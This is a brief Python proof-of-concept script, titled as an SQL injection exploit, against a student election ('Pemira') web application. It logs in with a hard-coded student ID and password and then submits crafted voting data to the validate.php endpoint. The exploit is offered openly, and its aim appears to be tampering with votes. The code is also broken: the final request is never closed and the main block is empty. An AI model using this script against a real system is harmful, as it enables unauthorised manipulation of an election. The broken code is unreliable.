PoC for Pemira Development Application SQLi Vulnerability
import requests
from PemiraHelper import login, PemiraParser, ID_BALMA, ID_SEMA
HOST = ""
NIM = "180010100"
def main():
parser = PemiraParser()
with requests.Session() as conn:
login_page = conn.post("http://%s/authenticate.php" % HOST, allow_redirects=True, data={
"nim": NIM,
"pass": "password",
"formSubmit": "Login"})
index_page = conn.get("http://%s" % HOST, allow_redirects=False)
voting_page = conn.post("http://%s/validate.php" % HOST, allow_redirects=False, data={
"token_": parser.TOKEN,
"senat": "JLamqe5q-KTU3vVnd",
"balma": "BVmJxh6E-S9af54pY",
"formSubmit": "Submit"
if __name__ == '__main__':